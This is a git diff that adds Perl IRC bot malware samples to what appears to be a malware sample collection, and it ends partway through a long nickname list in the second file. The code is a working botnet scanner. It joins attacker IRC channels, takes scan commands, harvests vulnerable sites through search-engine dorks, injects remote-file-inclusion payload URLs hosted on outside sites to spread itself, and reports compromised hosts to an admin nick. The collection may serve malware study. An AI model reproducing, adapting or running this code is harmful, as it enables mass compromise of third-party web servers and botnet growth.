+sub fetch(){
+my $rnd=(int(rand(9999)));
+my $n= 80;
+if ($rnd<5000) { $n<<=1;}
+my $s= (int(rand(10)) * $n);
+{
+my @dominios = ("removed-them-all");
+my @str;
+foreach $dom  (@dominios)
+{
+push (@str,"@gstring");
+}
+my $query="www.google.com/search?q=";
+$query.=$str[(rand(scalar(@str)))];
+$query.="&num=$n&start=$s";
+my @lst=();
+sendraw("privmsg #debug :DEBUG only test googling: ".$query."");
+my $page = http_query($query);
+while ($page =~  m/<a href=\"?http:\/\/([^>\"]+)\"? class=l>/g){
+if ($1 !~ m/google|cache|translate/){
+push (@lst,$1);
+}
+}
+return (@lst);
+}
+sub http_query($){
+my ($url) = @_;
+my $host=$url;
+my $query=$url;
+my $page="";
+$host =~ s/href=\"?http:\/\///;
+$host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/;
+$query =~s/$host//;
+if ($query eq "") {$query="/";};
+eval {
+local $SIG{ALRM} = sub { die "1";};
+alarm 10;
+my $sock = IO::Socket::INET->new(PeerAddr=>"$host",PeerPort=>"80",Proto=>"tcp") or return;
+print $sock "GET $query HTTP/1.0\r\nHost: $host\r\nAccept: */*\r\nUser-Agent: Mozilla/5.0\r\n\r\n";
+my @r = <$sock>;
+$page="@r";
+alarm 0;
+close($sock);
+};
+return $page;
+}
+}
diff --git a/Perl/Backdoor.Perl.IRCBot.w b/Perl/Backdoor.Perl.IRCBot.w
new file mode 100644
index 00000000..196682ff
--- /dev/null
+++ b/Perl/Backdoor.Perl.IRCBot.w
@@ -0,0 +1,487 @@
+use HTTP::Request;
+use LWP::UserAgent;
+use IO::Socket::INET;
+
+
+my $cmd = "http://www.wauze.de//language/lang_english/RuLeZ/me.txt?";
+my $cmdprint = "http://www.wauze.de//language/lang_english/r.txt??";
+my $nick = "UnIx|".(int(rand(99)));
+my $ident = "xpl";
+my $chan = "#r4k3t";
+my $server = "211.21.73.10";
+my $http = "Googlebot";
+my $port = 6667;
+my $sock;
+my $proxy = 30;
+my $admin = "SuPrEmO";
+my $stringa = "!scan";
+my $spread = "http://www.malteser-paderborn.de//contenido/includes/c.txt?";
+my @User_Agent = &Agent();
+my $pid = fork();
+
+if($pid==0){
+	&irc($nick,$ident,$chan,$server,$port);
+}else{
+	exit(0);
+}
+
+sub irc(){
+	my($nick,$ident,$chan,$server,$port)=@_;
+	$sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$server",PeerPort=>$port);
+	$sock->autoflush(1);
+	print $sock "NICK ".$nick."\r\n";
+	print $sock "USER ".$ident." 8 *  : By SISTEM\r\n";
+	print $sock "JOIN ".$chan."\r\n";
+	while( $cmdline = <$sock> ){
+		if ( $cmdline =~ /PRIVMSG $chan :$stringa\s+(.*?)\s+(.*)/ ) {
+			if(fork() == 0){
+				my($bug,$dork)=($1,$2);
+				&scan($bug,$dork);
+				exit(0);
+			}
+		}
+		if ($cmdline =~ /PRIVMSG $chan :!info/){
+			&privmsg($chan,"9[10Per scannare9]: 15$stringa bug dork");
+		}
+                if ($cmdline =~ /PRIVMSG $chan :!outbye/){
+                         exit(0);
+		}
+		if($cmdline =~ /^PING \:(.*)/){
+			print $sock "PONG :$1";
+		}
+	}
+}
+
+sub scan(){
+	my($bug,$dork)=@_;
+	my $contatore = 0;
+	&privmsg($chan,"9[10Scansione Per9]: 5Bug:".$bug);
+	&privmsg($chan,"9[10Scansione Per9]: 6Dork:".$dork);
+	my @proc;
+	$proc[9] = fork();
+	if($proc[9] == 0){
+		&privmsg($chan,"9[10Scansione Di9]: 6Google4:".scalar(&Google($dork)));
+		exit;
+	}
+	$proc[1] = fork();
+	if($proc[1] == 0){
+		&privmsg($chan,"9[10Scansione Di9]: 6Yahoo4:".scalar(&Yahoo($dork)));
+		exit;
+	}
+	$proc[2] = fork();
+	if($proc[2] == 0){
+		&privmsg($chan,"9[10Scansione Di9]: 6Altavista4:".scalar(&Altavista($dork)));
+		exit;
+	}
+	$proc[3] = fork();
+	if($proc[3] == 0){
+		&privmsg($chan,"9[10Scansione Di9]: 6Lycos4:".scalar(&Gigablast($dork)));
+		exit;
+	}
+	$proc[4] = fork();
+	if($proc[4] == 0){
+		&privmsg($chan,"9[10Scansione Di9]: 6Msn4:".scalar(&Msn($dork)));
+		exit;
+	}
+	$proc[5] = fork();
+	if($proc[5] == 0){
+		&privmsg($chan,"9[10Scansione Di9]: 6Ilse.Nl4:".scalar(&Ask($dork)));
+		exit;
+	}
+	$proc[6] = fork();
+	if($proc[6] == 0){
+		&privmsg($chan,"9[10Scansione Di9]: 6Tiscali4:".scalar(&Fireball($dork)));
+		exit;
+	}
+	$proc[7] = fork();
+	if($proc[7] == 0){
+		&privmsg($chan,"9[10Scansione Di9]: 6Alltheweb4:".scalar(&Alltheweb($dork)));
+		exit;
+	}
+	$proc[8] = fork();
+	if($proc[8] == 0){
+		&privmsg($chan,"9[10Scansione Di9]: 6Aol4:".scalar(&Aol($dork)));
+		exit;
+	}
+	waitpid($proc[9],0);
+	waitpid($proc[1],0);
+	waitpid($proc[2],0);
+	waitpid($proc[3],0);
+	waitpid($proc[4],0);
+	waitpid($proc[5],0);
+	waitpid($proc[6],0);
+	waitpid($proc[7],0);
+	waitpid($proc[8],0);
+	my @links = &GetLink();
+	my @forks;
+	my $forked++;
+	&privmsg($chan,"9[10Ricerca9]: 15Totals Results:".scalar(@links));
+	my @uni = &Unici(@links);
+	&privmsg($chan,"9[10Ricerca9]: 15Cleaned:".scalar(@uni));
+	&Remove();
+	my $testx = scalar(@uni);
+	my $startx = 0;
+	foreach my $sito (@uni){
+		$contatore++;
+		my $link = "http://" . $sito . $bug . $cmd . "?";
+		my $link = "http://" . $sito . $bug . $spread . "?";
+		if($contatore %$proxy == 0){
+			my $start = 0;
+			foreach my $f(@forks){
+				waitpid($f,0);
+				$forks[$start--];
+				$start++;
+			}
+			$startx = 0;
+		}
+		$forks[$startx]=fork();
+		if($forks[$startx] == 0){
+			my $htmlsito = &Query($link,"3");
+			if($htmlsite =~ /JaheeM/ && $htmlsite =~ /uid=/){
+				&privmsg($chan,"9[4SAFE OFF9]: 8"."http://" . $sito . $bug . "3" . $cmdprint . "?");
+				&privmsg($admin,"9[4SAFE OFF9]: 8"."http://" . $sito . $bug . "3" . $cmdprint . "?");
+				&privmsg($admin,"9[4SPreAD9]: 8"."http://" . $sito . $bug . "4" . $spread . "?");
+
+			}
+			elsif($htmlsito =~ /JaheeM/){
+				&privmsg($chan,"9[11SAFE ON9]: 7"."http://" . $sito . $bug . "7" . $cmdprint . "?");
+				&privmsg($admin,"9[11SAFE ON9]: 7"."http://" . $sito . $bug . "7" . $cmdprint . "?");
+				&privmsg($admin,"9[11SpreaD9]: 7"."http://" . $sito . $bug . "4" . $spread . "?");
+
+			}
+			exit(0);
+		}
+		if($contatore %200 == 0){
+			&privmsg($chan,"9[10Ricerca9]: 7Scannati ".$contatore." di ".$testx);
+		}
+		$startx++;
+	}
+	my $start = 0;
+	foreach my $f(@forks){
+		waitpid($f,0);
+		$forks[$start--];
+		$start++;
+	}
+	&privmsg($chan,"9[10Ricerca4]:".$bug .$dork);
+	&privmsg($chan,"9[10Ricerca4]: 7Fine.");
+}
+
+sub privmsg(){
+	my ($cha,$cosi)=@_;
+	print $sock "PRIVMSG ".$cha." :".$cosi."\r\n";
+}
+
+sub Google(){
+	my($dork)=@_;
+	$dork=&Key($dork);
+	my $start;
+	my $num=100;
+	my $max=100*10;
+	my @dom = &GoogleDomains();
+	my $file = "google.txt";
+	my $html;
+	my @result;
+	foreach my $dominio (@dom){
+		for($start=0;$start < $max; $start += $num){
+			$html.=&Query("http://www.google.".$dominio."/search?q=".$dork."&num=100&hl=de&cr=countryDE&start=".$start."&sa=N");
+		}
+	}
+	while($html =~ m/<h2 class=r><a href=\"http:\/\/(.+?)\"/g){
+		$1 =~ /google/ || push(@result,&Links($1,$file));
+	}
+	return(@result);
+}
+
+sub Yahoo(){
+	my($dork)=@_;
+	$dork=&Key($dork);
+	my $start;
+	my $num=100;
+	my $max=100*10;
+	my $file = "yahoo.txt";
+	my $html;
+	my @result;
+	for($start=0;$start < $max; $start += $num){
+		$html.=&Query("http://search.yahooapis.com/WebSearchService/V1/webSearch?appid=SiteSearch&query=".$dork."&results=".$num."&start=".$start);
+	}
+	while($html =~ m/<Url>http:\/\/(.+?)\<\/Url>/g){
+		$1 =~ /yahoo/ || push(@result,&Links($1,$file));
+	}
+	return(@result);
+}
+
+sub Altavista(){
+	my($dork)=@_;
+	$dork=&Key($dork);
+	my $start;
+	my $num=100;
+	my $max=100*10;
+	my $file = "altavista.txt";
+	my $html;
+	my @result;
+	for($start=0;$start < $max; $start += $num){
+		$html.=&Query("http://de.altavista.com/web/results?itag=ody&pg=aq&aqmode=s&aqa=".$dork."&aqp=&aqo=&aqn=&kgs=1&kls=1&filetype=&rc=dmn&swd=&lh=&nbq=50&stq=".$start);
+	}
+	while($html =~ m/<span class=ngrn>(.+?)\ <\/span>/g){
+		if($1 !~ /yahoo/ && $1 !~ /Altavista/){
+			push(@result,&Links($1,$file));
+		}
+	}
+	return(@result);
+}
+
+sub Gigablast(){
+	my($dork)=@_;
+	$dork=&Key($dork);
+	my $start;
+	my $max=99;
+	my $file = "gigablast.txt";
+	my $html;
+	my @result;
+      for($start=1;$start < $max; $start += 1){
+	$html.=&Query("http://suche.lycos.de/cgi-bin/pursuit?pag=".$start."&query=".$dork."&SITE=de&cat=loc&enc=utf-8");
+}
+	while($html =~ m/href=\"(.+?)\"/g){
+		push(@result,&Links($1,$file));
+	}
+	return(@result);
+}
+
+sub Msn(){
+	my($dork)=@_;
+	$dork=&Key($dork);
+	my $start;
+	my $num=10;
+	my $max=100*10;
+	my $file = "msn.txt";
+	my $html;
+	my @result;
+	for($start=1;$start < $max; $start += $num){
+		$html.=&Query("http://search.live.com/results.aspx?q=".$dork."&lf=1&rf=1&first=".$start);
+	}
+	while($html =~ m/<a href=\"http:\/\/(.+?)\"/g){
+		$1 =~ /msn/ || push(@result,&Links($1,$file));
+	}
+	return(@result);
+}
+
+sub Ask(){
+	my($dork)=@_;
+	$dork=&Key($dork);
+	my $start;
+	my $num=1;
+	my $max=100;
+	my $file = "ask.txt";
+	my $html;
+	my @result;
+	for($start=1;$start < $max; $start += $num){
+		$html.=&Query("http://search.ilse.nl/web?rid=PREV&pagnum=".$start."&search_for=".$dork);
+	}
+	while($html =~ m/\">(.+?)<\/a>/g){
+		$1 =~ /ask/ || push(@result,&Links($3,$file));
+	}
+	return(@result);
+}
+
+sub Fireball(){
+	my($dork)=@_;
+	$dork=&Key($dork);
+	my $start;
+	my $num=1;
+	my $max=99;
+	my $file = "fireball.txt";
+	my $html;
+	my @result;
+	for($start=1;$start < $max; $start += $num){
+		$html.=&Query("http://search-dyn.tiscali.de/search.php?key=".$dork."&collection=de&tiscalitype=web&hits=10&language=de&maxCount=&collapse=on&spell=suggest&pg=".$start."&offset=".(($start-1)*10)."&xargs=");
+	}
+	while($html =~ m/onmouseover=\"window.status=\'http:\/\/(.+?)\'/g){
+		$1 =~ /tiscali/ || push(@result,&Links($1,$file));
+	}
+	return(@result);
+}
+
+sub Alltheweb(){
+	my($dork)=@_;
+	$dork=&Key($dork);
+	my $start;
+	my $num=100;
+	my $max=100*10;
+	my $file = "alltheweb.txt";
+	my $html;
+	my @result;
+	for($start=0;$start < $max; $start += $num){
+		$html.=&Query("http://www.alltheweb.com/search?advanced=1&cat=web&type=all&hits=".$num."&ocjp=1&q=".$dork."&o=".$start);
+	}
+	while($html =~ m/<span class=\"resURL\">http:\/\/(.+?)\ /g){
+		$1 =~ /alltheweb/ || push(@result,&Links($1,$file));
+	}
+	return(@result);
+}
+
+sub Aol(){
+	my($dork)=@_;
+	$dork=&Key($dork);
+	my $start;
+	my $num=1;
+	my $max=100;
+	my $file = "aol.txt";
+	my $html;
+	my @result;
+	for($start=0;$start < $max; $start += $num){
+		$html.=&Query("http://suche.aol.de/aol/search?query=".$dork."&page=".$start."&nt=SG2&langRestrict=2&q=".$dork."&rp=lang_de");
+	}
+	while($html =~ m/<p class=\"deleted\" property=\"f:url\">http:\/\/(.+?)\<\/p>/g){
+		$1 =~ /aol/ || push(@result,&Links($1,$file));
+	}
+	return(@result);
+}
+
+sub Query(){
+	my($link,$timeout)=@_;
+	my $req=HTTP::Request->new(GET=>$link);
+	my $ua=LWP::UserAgent->new();
+	$ua->agent($User_Agent[rand(scalar(@User_Agent))]);
+	$ua->timeout($timeout);
+	my $response=$ua->request($req);
+	return $response->content;
+}
+
+sub Key(){
+	my $chiave=$_[0];
+	$chiave =~ s/ /\+/g;
+	$chiave =~ s/:/\%3A/g;
+	$chiave =~ s/\//\%2F/g;
+	$chiave =~ s/&/\%26/g;
+	$chiave =~ s/\"/\%22/g;
+	$chiave =~ s/\\/\%5C/g;
+	$chiave =~ s/,/\%2C/g;
+	return $chiave;
+}
+
+sub GetLink(){
+	my @file = ("google.txt","yahoo.txt","altavista.txt","gigablast.txt","msn.txt","ask.txt","fireball.txt","alltheweb.txt","aol.txt");
+	my $link;
+	my @total;
+	foreach my $n (@file){
+		open(F,'<',$n);
+		while($link = <F>){
+			$link=~s/[\r\n]//g;
+			push(@total,$link);
+		}
+		close(F);
+	}
+	return(@total);
+}
+
+sub Remove(){
+	my @file = ("google.txt","yahoo.txt","altavista.txt","gigablast.txt","msn.txt","ask.txt","fireball.txt","alltheweb.txt","aol.txt");
+	foreach my $n (@file){
+		system("rm -rf ".$n);
+	}
+}
+
+sub Links(){
+	my ($link,$file_print) = @_;
+	my $host = $link;
+	my $host_dir = $host;
+	my @links;
+	$host_dir=~s/(.*)\/[^\/]*$/\1/;
+	$host=~s/([-a-zA-Z0-9\.]+)\/.*/$1/;
+	$host_dir=&End($host_dir);
+	$host=&End($host);
+	$link=&End($host);
+	push(@links,$link,$host,$host_dir);
+	open($file,'>>',$file_print);
+	print $file "$link\n$host_dir\n$host\n";
+	close($file);
+	return @links;
+}
+
+sub End(){
+	$stringa=$_[0];
+	$stringa.="/";
+	$stringa=~s/\/\//\//;
+	while($stringa=~/\/\//){
+		$stringa=~s/\/\//\//;
+	}
+	return($stringa);
+}
+
+sub Unici{
+	my @unici = ();
+	my %visti = ();
+	foreach my $elemento ( @_ ){
+		next if $visti{ $elemento }++;
+		push @unici, $elemento;
+	}
+	return @unici;
+}
+
+sub Agent(){
+	my @ret = (
+	"Microsoft Internet Explorer/4.0b1 (Windows 95)",
+	"Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)",
+	"Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)",
+	"Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)",
+	"Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)",
+	"Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)",
+	"Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)",
+	"Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)",
+	"Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)",
+	"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)",
+	"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)",
+	"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)",
+	"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)",
+	"Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)",
+	"Mozilla/4.0 (compatible; MSIE 7.0b; Win32)",
+	"Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)",
+	"Microsoft Pocket Internet Explorer/0.6",
+	"Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)",
+	"MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;",
+	"Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)",
+	"Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)",
+	"Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)",
+	"Advanced Browser (http://www.avantbrowser.com)",
+	"Avant Browser (http://www.avantbrowser.com)",
+	"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)",
+	"Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)",
+	"Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)",
+	"Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007",
+	"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511",
+	"Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929",
+	"Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0",
+	"Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox",
+	"Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4",
+	"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5",
+	"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6",
+	"Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6",
+	"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7",
+	"Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7",
+	"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4",
+	"Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4",
+	"Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5",
+	"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1",
+	"Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1",
+	"Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1",
+	"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1",
+	"Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1",
+	"Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2",
+	"Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0",
+	"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b",
+	"Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0",
+	"Mozilla/3.0 (OS/2; U)",
+	"Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)",
+	"Mozilla/4.61 (Macintosh; I; PPC)",
+	"Mozilla/4.61 [en] (OS/2; U)",
+	"Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)",
+	"Mozilla/4.8 [en] (Windows NT 5.0; U)" );
+return(@ret);
+}
+sub GoogleDomains(){
+	my @dom = ("at","ch","de","fr","gr","nl","pt","co.uk","be");
+return(@dom);
+}
+
+
+
diff --git a/Perl/Backdoor.Perl.IRCBot.y b/Perl/Backdoor.Perl.IRCBot.y
new file mode 100644
index 00000000..1de59251
--- /dev/null
+++ b/Perl/Backdoor.Perl.IRCBot.y
@@ -0,0 +1,2114 @@
+# %.%.%.%.%.%.%.%.%.%.%.%.%.%.%.%
+# % cHApoenk XtReme scanner Bot  %
+# %.%.%.%.%.%.%.%.%.%.%.%.%.%.%.%
+#################################
+
+######################
+use HTTP::Request;
+use LWP::UserAgent;
+######################
+my $processo = '/usr/sbin/httpd';
+######################
+#####################################################################
+#/!\                          .:CONFIGURATION:.                  /!\#
+#####################################################################
+############################################
+my $linas_max='8';
+#-----------------                         #
+# Maximum Lines for Anti Flood             #
+#############################################
+my $sleep='5';
+#-----------------                         #                                      
+#Sleep Time                                #
+############################################
+my $cmd="http://www.headwatersinc.org/newsroom/images/billgate.txt??";
+#-----------------                         #
+#CMD that is printed in the channel        #
+############################################
+my $id="http://www.ads.dynahoo.com/images/test.txt?";
+#-----------------                         #
+#ID = Response CMD                         #
+############################################
+my $spread="http://www.ads.dynahoo.com/images/er.txt";
+#-----------------                         #
+#Spreader                                  #
+############################################
+my @adms=("billgate");
+#my @hostauth=("1980");
+#-----------------                         #
+#Admins of the Bot set your nickname here  #
+############################################
+my @canais=("#indohackerlink");
+#-----------------                         #
+#Put your channel here                     #
+############################################
+my @nickname = ("Abdulrazak","Ackerman","Adams","Addison","Adelstein","Adibe","Adorno","Ahlers","Alavi","Alcorn","Alda", "Aleks","Allison","Alongi","Altavilla","Altenberger","Altenhofen","Amaral","Amatangelo","Ameer","Amsden","Anand","Andel", "Ando","Andrelus","Andron","Anfinrud","Ansley","Anthony","Antos","Arbia","Arduini","Arellano","Aristotle","Arjas","Arky","Atkins", "Augustus","Aurelius","Axelrod","Axworthy","Ayiemba","Aykroyd","Ayling","Azima","Bachmuth","Backus","Bady","Baglivo","Bagnold", "Bailar","Bakanowsky","Baleja","Ballatori","Ballew","Baltz","Banta","Barabesi","Barajas","Baranczak","Baranowska","Barberi","Barbetti", "Barneson","Barnett","Barriola","Barry","Bartholomew","Bartolome","Bartoo","Basavappa","Bashevis","Batchelder","Baumiller","Bayles","Bayo", "Beacon","Beal","Bean","Beckman","Beder","Bedford","Behenna","Belanger","Belaoussof","Belfer","Belin-Collart","Bellavance","Bellhouse", "Bellini","Belloc","Benedict-Dye","Bergson","Berke-Jenkins","Bernardo", "Bernassola","Bernston","Berrizbeitia","Betti","Beynart","Biagioli", "Bickel","Binion","Bir","Bisema","Bisho","Blackbourn","Blackwell","Blagg","Blakemore","Blanke","Bliss","Blizard","Bloch","Bloembergen", "Bloemhof","Bloxham","Blyth","Bolger","Bolick","Bollinger","Bologna","Boner","Bonham","Boniface","Bontempo","Book","Bookbinder","Boone", "Boorstin","Borack","Borden","Bossi","Bothman","Botosh","Boudin","Boudrot","Bourneuf","Bowers","Boxer","Boyajian","Boyes","Boyland", "Boym", "Boyne","Bracalente","Bradac","Bradach","Brecht","Breed","Brenan","Brennan","Brewer","Brewer","Bridgeman","Bridges","Brinton", "Britz","Broca","Brook","Brzycki","Buchan","Budding","Bullard","Bunton","Burden","Burdzy","Burke","Burridge","Busetta","Byatt","Byerly", "Byrd","Cage","Calnan","Cammelli","Cammilleri","Canley","Capanni","Caperton","Capocaccia","Capodilupo","Cappuccio","Capursi","Caratozzolo", "Carayannopoulos","Carlin","Carlos","Carlyle","Carmichael","Caroti","Carper","Cartmill","Cascio","Case","Caspar","Castelda","Cavanagh", "Cavell","Ceniceros","Cerioli","Chapman","Charles","Cheang","Cherry","Chervinsky","Chiassino","Chien","Childress","Childs","Chinipardaz", "Chinman","Christenson","Christian","Christiano","Christie","Christopher","Chu","Chupasko","Church","Ciampaglia","Cicero","Cifarelli", "Claffey","Clancy","Clark","Clement","Clifton","Clow","Coblenz","Coito","Coldren","Colella","Collard","Collis","Compton","Compton", "Comstock","Concino","Condodina","Connors","Corey","Cornish","Cosmides","Counter","Coutaux","Crawford","Crocker","Croshaw","Croxen", "Croxton","Cui","Currier","Cutler","Cvek","Cyders","daSilva","Daldalian","Daly","D'Ambra","Danieli","Dante","Dapice","D'arcangelo","Das", "Dasgupta","Daskalu","David","Dawkins","DeGennaro","DeLaPena","del'Enclos","deRousse","Debroff","Dees","Defeciani","Delattre","Deleon-Rendon", "Delger","Dell'acqua","Deming","Dempster","Demusz","Denault","Denham","Denison","Desombre","Deutsch","D'fini","Dicks","Diefenbach","Difabio", "Difronzo","Dilworth","Dionysius","Dirksen","Dockery","Doherty","Donahue","Donner","Doonan","Dore","Dorf","Dosi","Doty","Doug","Dowsland", "Drinker","D'souza","Duffin","Durrett","Dussault","Dwyer","Eardley","Ebeling","Eckel","Edley","Edner","Edward","Eickenhorst","Eliasson", "Elmendorf","Elmerick","Elvis","Encinas","Enyeart","Eppling","Erbach","Erdman","Erdos","Erez","Espinoza","Estes","Etter","Euripides", "Everett","Fabbris","Fagan","Faioes","Falco-Acosta","Falorsi","Faris","Farone","Farren","Fasso'","Fates","Feigenbaum","Fejzo","Feldman", "Fernald","Fernandes","Ferrante","Ferriell","Feuer","Fido","Field","Fink","Finkelstein","Finnegan","Fiorina","Fisk","Fitzmaurice","Flier", "Flores","Folks","Forester","Fortes","Fortier","Fossey","Fossi","Francisco","Franklin-Kenea","Franz","Frazier-Davis","Freid","Freundlich", "Fried","Friedland","Frisken","Frowiss","Fryberger","Frye","Fujii-Abe","Fuller","Furth","Fusaro","Gabrielli","Gaggiotti","Galeotti","Galwey", "Gambini","Garfield","Garman","Garonna","Geller","Gemberling","Georgi","Gerrett","Ghorai","Gibbens","Gibson","Gilbert","Gili","Gill","Gillispie", "Gist","Gleason","Glegg","Glendon","Goldfarb","Goncalves","Good","Goodearl","Goody","Gozzi","Gravell","Greenberg","Greenfeld","Griffiths", "Grigoletto","Grummell","Gruner","Gruppe","Guenthart","Gunn","Guo","Ha","Haar","Hackman","Hackshaw","Haley","Halkias","Hallowell","Halpert", "Hambarzumjan","Hamer","Hammerness","Hand","Hanssen","Harding","Hargraves","Harlow","Harrigan","Hartman","Hartmann","Hartnett","Harwell", "Haviaras","Hawkes","Hayes","Haynes","Hazlewood","Heermans","Heft","Heiland","Hellman","Hellmiss","Helprin","Hemphill","Henery","Henrichs", "Hernandez","Herrera","Hester","Heubert","Heyeck","Himmelfarb","Hind","Hirst","Hitchcock","Hoang","Hock","Hoffer","Hoffman","Hokanson","Hokoda", "Holmes","Holoien","Holter","Holway","Holzman","Hooker","Hopkins","Horsley","Hoshida","Hostage","Hottle","Howard","Hoy","Huey","Huidekoper", "Hungerford","Huntington","Hupp","Hurtubise","Hutchings","Hyde","Iaquinta","Ichikawa","Igarashi","Inamura","Inniss","Isaac","Isaievych","Isbill", "Isserman","Iyer","Jacenko","Jackson","Jagers","Jagger","Jagoe","Jain","Jamil","Janjigian","Jarnagin","Jarrell","Jay","Jeffers","Jellis", "Jenkins","Jespersen","Jewett","Johannesson","Johannsen","Johns","Jolly","Jorgensen","Jucks","Juliano","Julious","Kabbash","Kaboolian","Kafadar", "Kalbfleisch","Kaligian","Kalil","Kalinowski","Kalman","Kamel","Kangis","Karpouzes","Kassower","Kasten","Kawachi","Kee","Keenan","Keepper", "Keith","Kelker","Kelsey","Kempton","Kemsley","Kendall","Kerry","Keul","Khong","Kimmel","Kimmett","Kimura","Kindall","Kinsley","Kippenberger", "Kirscht","Kittridge","Kleckner","Kleiman","Kleinfelder","Klemperer","Kling","Klinkenborg","Klint","Knuff","Kobrick","Koch","Kohn","Koivumaki", "Kommer","Koniaris","Konrad","Kool","Korzybski","Kotter","Kovaks","Kraemer","Krailo","Krasney","Kraus","Kroemer","Krysiak","Kuenzli","Kumar", "Kusman","Kuwabara","La","Labunka","Lafler","Laing","Lallemant","Landes","Lankes","Lantieri","Lanzit","Laserna","Lashley","Lawless","Lecar", "Lecce","Leclercq","Leite","Lenard","Sofia","Lesser","Lessi","Liakos","Lidano","Liem","Light","Lightfoot","Lim","Linares","Linda","Linder", "Line","Linehan","Linzee","Lippmann","Lipponen","Little","Litvak","Livernash","Livi","Livolsi","Lizardo","Locatelli","Longworth","Loss","Loveman", "Lowenstein","Loza","Lubin","Lucas","Luciano","Luczkow","Luecke","Lunetta","Luoma","Lussier","Lutcavage","Luzader","Ma","Maccormac","Macdonald", "Maceachern","Macintyre","Mackenney","MacMillan","Macy","Madigan","Maggio","Mahony","Maier","Maine-Hershey","Maisano","Malatesta","Maller", "Malova","Manalis","Mandel","Manganiello","Mantovan","March","Marchbanks","Marcus","Margalit","Margetts","Marques","Martinez","Martochio", "Marton","Marubini","Mass","Matalka","Matarazzo","Matsukata","Mattson","Mauzy","May","Mazzali","Mazziotta","Mcbride","Mccaffery","Mccall", "Mcclearn","Mcdowell","Mcelroy","McFadden","Mcghee","Mcgoldrick","McIlroy","Mcintosh","Mcdonald","Mclane","Mclaren","Mcnealy","Mcnulty", "Meccariello","Memisoglu","Menzies","Merikoski","Merlani","Merminod","Merseth","Merz","Metelka","Metropolis","Meurer","Michelman","Middle", "Mieher","Mills","Minh","Mini","Minichiello","Gonzalez","Mitropoulos","Mittal","Mocroft","Modestino","Moeller","Mohr","Moiamedi","Monque","Montilio", "MooreDeCh.","Morani","Moreton","Morrison","Morrow","Mortimer","Mosher","Mosler","Mostafavi","Motooka","Mudarri","Muello","Mugnai","Mulkern", 